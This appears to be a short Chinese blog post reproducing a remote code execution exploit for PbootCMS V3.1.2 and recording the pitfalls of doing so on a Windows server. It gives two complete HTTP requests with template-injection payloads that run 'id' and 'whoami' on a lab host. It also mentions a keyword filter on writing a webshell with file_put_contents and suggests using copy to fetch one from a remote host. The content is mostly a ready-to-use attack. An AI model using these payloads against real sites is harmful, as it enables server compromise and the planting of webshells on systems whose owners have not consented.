PbootCMS V3.1.2 Rce复现以及踩坑

Posted on

服务器是 Windows 环境,测试苏安大佬的 exp 有问题,踩坑记录

苏安大佬的文章:pboot cms V3.1.2 “虚假的无文件落地RCE” - Suanve - Blog (susec.me)

使用苏安大佬 exp 测试 Linux 没问题

1
2
3
4
5
6
7
8
9
10
GET /index.php/keyword?keyword=}{pboot:if((get_lg/*suanve-*/())/**/(get_backurl/*suanve-*/()))}123321suanve{/pboot:if}&backurl=;id HTTP/1.1
Host: 192.168.88.66
Accept: text/plain, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://192.168.88.66/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: lg=system; PbootSystem=8ea446nv2usihctikbjm7qg6c6
Connection: close

image-20221011125217232

但是在 Windows 下不成功,测试使用如下 exp 可执行命令

1
2
3
4
5
6
7
8
9
10
GET /?member/login/?a=}{pboot:if((get_lg/*aaa-*/())/**/("whoami"))}{/pboot:if} HTTP/1.1
Host: 192.168.88.66
Accept: text/plain, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://192.168.88.66/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: lg=system; PbootSystem=8ea446nv2usihctikbjm7qg6c6
Connection: close

image-20221011125710520

webshell 时用 file_put_contents 写入时有关键字限制,存在以下关键字写不进去

image-20221011125801772

可使用 copy 函数远程落地

end! 苏安大佬nb